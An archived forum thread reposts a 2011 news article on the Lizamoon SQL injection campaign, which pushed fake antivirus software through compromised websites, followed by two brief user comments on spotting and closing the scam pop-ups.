View Full Version : Fake Anitvirus Website Hack

The Mad Monk
01-04-2011, 21:15:34
Thousands of Web Sites Hit With New Twist on Old SQL Injection Hack
by Arik Hesseldahl
Posted on April 1, 2011 at 1:10 PM PT

SharePrint A relatively simple hack has been used to compromise at least 500,000 Web sites, and perhaps as many as 1.5 million, in such a way that visitors are tricked into downloading fake PC security software.

Dubbed Lizamoon, after the Web site where some users are in some cases redirected, the attack was first documented by the security research firm Websense The hack seeks to trick Web users into believing that their computer has been compromised by viruses and prompts them to download fake security software that itself causes further problems. Among the sites serving up the links to the fake software sites are some belonging to Apple and used on its iTunes store, though Apple is said to have cleaned up the affected code on its site.

Websense says that so far it appears that sites using Microsoft SQL Server 2003 and 2005 are at risk, though as yet SQL Server 2008 doesn’t appear to be affected. No word yet from Microsoft about any of this, though I’ve asked them for a comment.

SQL injection attacks take place when malicious code–essentially commands to a Web server to do things it’s not supposed to do — are inserted into routine queries of a Web site’s data base. A basic way to carry out these attacks is to add extra commands into the URL bar of a the browser when visiting a vulnerable Web site. It’s not entirely clear exactly how this series of attacks has been carried out.

I talked with Josh Shaul, CTO of Application Security, Inc., a database security vendor that specializes in researching attacks on databases. “It’s a very new take on a very old type of attack,” Shaul said. “SQL injection has been the primary way that databases have been attacked for years. What’s different here is that people are putting the code that runs their Web sites in the database itself. And that’s what’s so troubling. Effectively you’ve exposed your code to an attacker so they can go modify it.”

Attackers found hundreds of thousands of sites that use a single user account to query their databases for all visitors, Shaul said. “The databases are clearly configured in an insecure way,” he said. “That’s what it all comes down to. Why is it that the log-in to use the database has the right to modify the code for the Web site itself? That makes no sense at all.”

In this case the attackers took advantage of the weakness to insert a script that creates a pop-up that sends a site’s visitors to another site that looks like a legitimate place to download new Microsoft security software. That makes the attack on the Web sites themselves just a means to an end–the end being tricking innocent Web users into clicking on a series of links and paying to download fake security software.

Websense produced a video demonstrating what happens. The short lesson is this: If you see a pop-up that tells you you’ve got a virus or that your computer is compromised by a bunch of security issues, don’t click any of the links in it; it’s probably not legit.


I've run into this on three webcomic sites. I nearly fell for it the first time, it's very good at instilling a feeling of panic. Once I realized that the OK button was going to intstall a .exe, I looked for a way to close the window, and concluded that the only safe way to do so was to kill the process from windows manager.

02-04-2011, 02:24:48
alt f4 is your friend